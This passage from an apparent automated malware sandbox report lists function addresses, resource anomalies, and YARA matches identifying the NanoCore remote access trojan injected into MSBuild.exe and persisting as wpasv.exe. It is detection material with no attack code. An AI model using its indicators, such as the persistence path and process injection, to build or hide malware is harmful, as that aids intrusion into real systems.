Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02B2F5F815_2_02B2F5F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02B2A5F815_2_02B2A5F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02B2A5D015_2_02B2A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06BB6C1015_2_06BB6C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06BB2C7815_2_06BB2C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06BB1DF015_2_06BB1DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06BB634015_2_06BB6340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06BB5FF815_2_06BB5FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_06BB2D3615_2_06BB2D36
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exeCode function: 16_2_015B51F916_2_015B51F9
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exeCode function: 16_2_015B18C016_2_015B18C0
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exeCode function: 16_2_015B237016_2_015B2370
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exeCode function: 18_2_04F651F918_2_04F651F9
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exeCode function: 18_2_04F6237018_2_04F62370
Source: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exeCode function: 18_2_04F61A2F18_2_04F61A2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 30_2_0320E47130_2_0320E471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 30_2_0320E48030_2_0320E480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 30_2_0320BBD430_2_0320BBD4
PE file contains strange resourcesShow sources
Source: GgNhpv.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: GgNhpv.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: GgNhpv.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wpasv.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wpasv.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wpasv.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: GgNhpv.exe, 00000000.00000002.817419204.0000000000CD0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.817194347.0000000000C50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000003.797888702.000000001B03D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.814854545.00000000008B0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000000.756009340.0000000000348000.00000002.00020000.sdmpBinary or memory string: OriginalFilename876544.exe4 vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.824265843.000000001B110000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.819878835.0000000002802000.00000004.00000001.sdmpBinary or memory string: OriginalFilenametaskschd.dll.muij% vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.819878835.0000000002802000.00000004.00000001.sdmpBinary or memory string: ,\\StringFileInfo\\040904B0\\OriginalFilenamexh vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.817094495.0000000000C00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.819495770.000000000275A000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs GgNhpv.exe
Source: GgNhpv.exe, 00000000.00000002.819495770.000000000275A000.00000004.00000001.sdmpBinary or memory string: ,\\StringFileInfo\\000004B0\\OriginalFilenamexh vs GgNhpv.exe
Source: GgNhpv.exeBinary or memory string: OriginalFilename876544.exe4 vs GgNhpv.exe
Yara signature matchShow sources
Source: GgNhpv.exe, type: SAMPLEMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: .text, type: SAMPLEMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000003.812356189.000000001B070000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1186978223.0000000005400000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186978223.0000000005400000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.811932086.000000001B0D5000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1188156970.00000000061D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1188156970.00000000061D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000F.00000002.1186893874.00000000053D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186893874.00000000053D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.813678995.00000000002D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1186233370.00000000050B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186233370.00000000050B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.824559362.000000001B2B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1186832328.00000000053B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186832328.00000000053B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.812525403.000000001B0AB000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1182142774.0000000002BE4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001E.00000002.1158787988.0000000004409000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.824133782.000000001B078000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1186856992.00000000053C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186856992.00000000053C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.812453823.000000001B2B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1179468544.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1179468544.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000F.00000002.1187390172.0000000005CC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1187390172.0000000005CC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001E.00000002.1156120893.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001E.00000002.1156120893.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000F.00000002.1186946814.00000000053F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186946814.00000000053F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.812561502.000000001B0CA000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.823522467.000000001AFF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1186346502.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186346502.00000000051C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000F.00000002.1186719168.0000000005370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186719168.0000000005370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000F.00000002.1186313236.00000000051B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1186313236.00000000051B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.812606471.000000001B078000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1187296119.0000000005C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1187296119.0000000005C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000F.00000002.1187421494.0000000005CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1187421494.0000000005CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.812308519.000000001B07F000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000000.755852415.00000000002D2000.00000002.00020000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1187312590.0000000005CA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.1187312590.0000000005CA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.812975624.000000001B08E000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000001E.00000002.1158420771.0000000003400000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000F.00000002.1184242562.0000000003E31000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: MSBuild.exe PID: 4220, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: MSBuild.exe PID: 4220, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: MSBuild.exe PID: 2072, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: MSBuild.exe PID: 2072, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 15.2.MSBuild.exe.5c90000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5c90000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.53d0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.53d0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.50b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.50b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.53f0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.53f0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.53d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.53d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.MSBuild.exe.5370000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.MSBuild.exe.5370000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
